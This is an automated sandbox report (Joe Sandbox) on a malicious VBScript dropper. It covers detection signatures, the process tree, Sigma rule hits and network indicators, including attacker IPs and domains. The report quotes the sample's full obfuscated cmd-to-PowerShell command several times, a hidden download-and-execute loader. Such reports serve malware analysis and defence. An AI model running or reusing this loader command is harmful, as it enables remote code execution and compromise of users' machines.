Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
analysis.vbs

Overview

General Information

Sample name:analysis.vbs
Analysis ID:1607480
MD5:f88fb28db55f790656578d4fa2a18281
SHA1:6c14e47dbc336247d467a3fa9c77ec7ffa2450b1
SHA256:834024ad5c7dd595bcb62b79d6a13dc654cbe0805e8e29dba9a3590834a576ba
Tags:vbsuser-qqw
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5608 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 320 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5780 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 149.56.240.127, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5608, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", ProcessId: 5608, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 149.56.240.127, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5608, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", ProcessId: 5608, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 320, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 6464, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.2% probability
Source: unknownHTTPS traffic detected: 149.56.240.127:443 -> 192.168.2.5:49704 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.56.240.127 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 45.93.9.167:15322
Source: Joe Sandbox ViewIP Address: 149.56.240.127 149.56.240.127
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s4.histats.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s4.histats.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: s4.histats.com
Source: global trafficDNS traffic detected: DNS query: host85500.info
Source: wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cot
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 00000000.00000002.2157235442.0000021326F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_opened-
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedP
Source: wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedh
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedjg
Source: wscript.exe, 00000000.00000003.2156569055.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155775019.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156362022.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156423007.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157099379.0000021326CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedl
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://histats.com/d_openedw2
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.hista
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histatl2
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/C
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/o
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/s
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/st
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histats.com/stats/0.php?4926118&
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s4.histav2
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 149.56.240.127:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: analysis.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.expl.evad.winVBS@8/5@2/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ime1wocq.hyz.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
